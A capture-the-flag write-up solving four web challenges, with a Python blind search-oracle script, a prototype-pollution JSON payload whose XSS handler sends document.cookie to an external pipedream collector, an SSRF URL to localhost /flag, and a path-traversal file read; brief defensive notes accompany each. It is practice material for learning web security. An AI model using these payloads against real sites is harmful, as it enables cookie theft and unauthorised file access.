WEB


WEB HACKING 1


#!/usr/bin/env python
# -*- coding: utf8 -*-

import requests

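# Recovers the flag one character at a time by using the search endpoint as a
# match / no-match oracle: when the keyword sent so far is accepted, the
# response contains the marker text tested below (presumably because the flag
# sits in content the search covers -- confirm against the challenge source).
# Defensive takeaway: a search feature that covers secret values leaks them
# through prefix queries; keep secrets out of searchable fields and rate-limit
# runs of near-identical queries.
headers = {'Cookie': 'DNT : 1;'}  # NOTE(review): looks like a placeholder cookie -- confirm it is required
# The angle brackets around the URL were markup residue, not part of the address.
url = "http://apse2021.cstec.kr:8022/search"
string = "1234567890abcdefghijklmnopqrstuvwxyz}"

pw = ""

for i in range(1, 100):
    for j in string:
        # Passing the keyword via `params` lets requests do the URL encoding.
        r = requests.get(
            url,
            params={"keyword": "apollob{" + pw + j},
            headers=headers,
            timeout=10,  # do not hang forever on an unresponsive server
        )
        if 'hey hacker, this is your mission' in r.text:
            pw = pw + j
            break
    else:
        # No candidate extended the prefix: the alphabet is incomplete or the
        # oracle stopped answering, so further rounds would only repeat.
        break

    print("apollob{" + pw)

    # The closing brace marks the end of the flag; the original kept looping
    # through all remaining rounds after this point.
    if pw.endswith("}"):
        break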

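WEB HACKING 2

The request body below carries nested `__proto__` keys (a prototype-pollution payload); the polluted `delegateTarget` value is an `<img>` tag whose `onerror` handler sends `document.cookie` to an external collector. Rejecting `__proto__`/`constructor` keys when merging client JSON and marking session cookies `HttpOnly` are the relevant defences.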


{
    "data":
    {
        "score": 100,
        "accelateIntervalTime": 10000,
        "dropIntervalTime": 1000,
        "__proto__":
        {
            "__proto__":
            {
                "preventDefault": "x",
                "handleObj": "x",
                "delegateTarget": "<img/src/onerror='fetch(`https://enowt0zdqkbivy3.m.pipedream.net/?q=`+document.cookie)'>"
            }
        }
    }
}

#apollob{1f9914cd32d31b364cbd6435c41c677da1b050f3a552d506ec5bf300699168a1a82bde82c6d65ce1fd7ad0829e706dff8b6312b7c8fd49708d00e45e0972c72a0f46}

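WEB HACKING 3

The `url` parameter is pointed at `localhost` with a `../` sequence to reach `/flag`; the encoded space after `http` presumably slips past a scheme or host filter. A server-side fetcher should parse the URL strictly, resolve the host, and allow-list destinations before requesting it.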


<http://apse2020.cstec.kr:5005/?url=http%20://localhost/../../../../../../flag>

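WEB HACKING 4

The `file` parameter of `download.php` is given the absolute path `/flag`, so the handler apparently does not confine reads to its download directory; canonicalise the path and check that it stays under the intended base directory before opening it.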


<http://apse2021.cstec.kr:8033/download.php?file=/flag>

WEB HACKING 5